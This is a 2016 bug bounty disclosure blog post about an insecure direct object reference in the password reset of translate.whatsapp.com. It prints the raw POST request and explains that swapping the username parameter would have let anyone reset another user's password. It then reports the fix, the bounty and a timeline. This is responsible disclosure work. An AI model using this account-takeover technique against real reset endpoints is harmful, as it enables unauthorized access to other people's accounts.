Tuesday, 24 May 2016

How I could have hacked Anyone's whatsapp translate account .

In the name of Allah the beneficent the Merciful.


It was a thursday night (day before my semester exam) when i came to know that whatsapp is now a part of Facebook bug bounty and started hunting
on it.
 Soon i discovered an account takeover Flaw in whatsapp translate website
translate.whatsapp.com .

Whatsapp translate has more than 10 million of it's users in all over the world.

The bug was Insecure Direct Object Reference in password reset functionality.

Here is the POST request :




POST /reset HTTP/1.1
Host: translate.whatsapp.com
Connection: keep-alive
Content-Length: 164
Cache-Control: max-age=0
Accept: text/html,application/xhtml+xml,application/xml;q=0.9,image/webp,*/*;q=0.8
Origin: https://translate.whatsapp.com/
Upgrade-Insecure-Requests: 1
User-Agent:
 Referer: https://translate.whatsapp.com/reset?id=0eebabde1b2144a4942b54ad22393982
Accept-Encoding: gzip, deflate
Accept-Language: en-US,en;q=0.8
Cookie: __utmt=1;

csrfmiddlewaretoken=&password=&password_again=&username=&hash_id=0eebabde1b2144a4942b54ad22393982





The parameter "username" was vulnerable which could have let me changed
anyone's password .

Here Insecure Direct object Reference (IDOR) could be exploited in username parameter to gain control of anyone's whatsapp translate account.


Just by replacing the username with victim's username it's Game over!!!


Here is the video POC.

VIDEO

Facebook fixed the issue in production within 2 hours of acknowledgment




and rewarded $1000 USD for my work.





Now it's no more possible to exploit the IDOR here which was affecting more than 10 million users.



Timeline :


May 13, 2016 at 1:07 AM  : Bug Reported

May 18, 2016 at 12:11 AM : Escalated by Facebook

May 18, 2016 at 2:27 AM  : Bug fixed and asked for Confirmation .
   
May 25, 2016 at 5:18 AM  :  Bounty Rewarded. 



I would like to Thanks Facebook Security for quick fix of issue in production server and as usual happy to save the community from getting hacked.

Thanks for Reading
Jai Hind  :) 
 
 
 
Contact  info :
facebook : facebook.com/haji.mohd871
twitter : @mohdhaji24
linkedin :  linkedin.com/in/mohd-haji-490960a0